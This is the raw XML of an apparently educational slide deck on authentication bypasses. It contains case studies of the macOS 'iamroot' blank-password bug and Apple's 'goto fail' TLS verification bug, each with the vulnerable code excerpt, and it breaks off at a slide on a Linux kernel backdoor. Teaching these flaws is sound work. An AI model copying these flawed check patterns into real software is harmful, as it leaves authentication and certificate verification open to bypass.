              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Brute-force/no rate limiting</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Outdated software/missing patches</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Weak password policy/recovery mechanisms</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Lack of 2FA</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1261" name="Google Shape;1261;p179"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7186726" y="3144753"/>
            <a:ext cx="1420401" cy="1424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80"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="322850" y="470325"/>
            <a:ext cx="7557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an Authentication Bypass?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1267" name="Google Shape;1267;p180"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="132675" y="1198725"/>
            <a:ext cx="8412600" cy="32388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6BBF4E"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Helvetica Neue"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>First-factor Bypass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: An attacker is able to assume the identity and/or forego authentication mechanisms altogether without a password</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" marR="0" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6BBF4E"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Helvetica Neue"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>Second-factor Bypass: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Same context as first-factor, except you would not have to verify something like a one-time pin or push authentication first</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Can be severe when an attacker can target an administrative user!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36"/>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Secrets Management &amp; Configuration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81"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="445025"/>
            <a:ext cx="3866700" cy="9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Apple and #iamroot</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1273" name="Google Shape;1273;p181"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4703475" y="1154250"/>
            <a:ext cx="4240592" cy="3090326"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1274" name="Google Shape;1274;p181"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="404800" y="1457575"/>
            <a:ext cx="3773700" cy="2787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In November 2017, a bug was announced with macOS High Sierra that allowed unprivileged users to gain root access simply by entering a blank root password when prompted</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="160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Apple and #iamroot</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1280" name="Google Shape;1280;p182"/>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cause was a logic bug when checking passwords</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>if (od_verify_crypt_password(original, hash, &amp;matches) != 0x0) {</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>//upgrade password</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>		upgrade_password(...);</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>	}</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Verdana"/>
              <a:ea typeface="Verdana"/>
              <a:cs typeface="Verdana"/>
              <a:sym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Apple and #iamroot</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1286" name="Google Shape;1286;p183"/>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return value of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" i="1"/>
              <a:t>od_verify_crypt_password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> was checked </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>(the function didn’t return an error), but the matches parameter was </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>not checked</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>if (od_verify_crypt_password(original, hash, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>&amp;matches</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>) != 0x0) {</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1400" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1400" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1400" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1400" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400" b="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>//upgrade password</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1400" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1400" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>		upgrade_password(...);</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1400" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1400" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>	}</a:t>
            </a:r>
            <a:endParaRPr sz="1400" b="1">
              <a:latin typeface="Source Code Pro"/>
              <a:ea typeface="Source Code Pro"/>
              <a:cs typeface="Source Code Pro"/>
              <a:sym typeface="Source Code Pr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Apple and goto fail;</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1292" name="Google Shape;1292;p184"/>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In 2014, iOS devices were vulnerable to a bug that allowed an attacker to perform Man-in-the-Middle attacks on SSL/TLS connections</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>The attacker could read any encrypted data, including credentials</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Verdana"/>
              <a:ea typeface="Verdana"/>
              <a:cs typeface="Verdana"/>
              <a:sym typeface="Verdana"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>The bug was named “goto fail;”, because…..</a:t>
            </a:r>
            <a:endParaRPr sz="1000" b="1">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85"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2104150" y="327300"/>
            <a:ext cx="6821400" cy="4488900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="711200" marR="254000" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="177689"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>if ((err = SSLFreeBuffer(&amp;hashCtx))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ReadyHash(&amp;SSLHashSHA1, &amp;hashCtx))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SSLHashSHA1.update(&amp;hashCtx, &amp;clientRandom))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SSLHashSHA1.update(&amp;hashCtx, &amp;serverRandom))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SSLHashSHA1.update(&amp;hashCtx, &amp;signedParams))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  </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SSLHashSHA1.final(&amp;hashCtx, &amp;hashOut))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err = sslRawVerify(...);</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Source Code Pro"/>
              <a:ea typeface="Source Code Pro"/>
              <a:cs typeface="Source Code Pro"/>
              <a:sym typeface="Source Code Pr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86"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2104000" y="333914"/>
            <a:ext cx="6821400" cy="4200300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="711200" marR="254000" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="177689"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1800"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>if ((err = SSLFreeBuffer(&amp;hashCtx))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ReadyHash(&amp;SSLHashSHA1, &amp;hashCtx))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SSLHashSHA1.update(&amp;hashCtx, &amp;clientRandom))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SSLHashSHA1.update(&amp;hashCtx, &amp;serverRandom))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SSLHashSHA1.update(&amp;hashCtx, &amp;signedParams))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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="E06666"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1100" b="1">
                <a:solidFill>
                  <a:srgbClr val="E06666"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>goto fail;  </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="E06666"/>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if ((err = SSLHashSHA1.final(&amp;hashCtx, &amp;hashOut)) != 0)</a:t>
            </a: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    goto fail;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>err = sslRawVerify(...);</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Source Code Pro"/>
              <a:ea typeface="Source Code Pro"/>
              <a:cs typeface="Source Code Pro"/>
              <a:sym typeface="Source Code Pr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Apple and goto fail;</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1308" name="Google Shape;1308;p187"/>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The double goto fail meant that regardless of whether an error occurred, execution would jump to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> label</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>This jump skipped the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Source Code Pro"/>
                <a:ea typeface="Source Code Pro"/>
                <a:cs typeface="Source Code Pro"/>
                <a:sym typeface="Source Code Pro"/>
              </a:rPr>
              <a:t>sslRawVerify()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> method, which was responsible for validating the SSL handshake</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-304800" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>This meant that anyone could tamper with the SSL handshake, and perform a Man-in-the-Middle attack, and the verification method would never be called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188"/>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Linux Kernel Backdoor</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1314" name="Google Shape;1314;p188"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="404800" y="1198725"/>
            <a:ext cx="7514700" cy="16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Authentication bypasses are not always unintentional</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
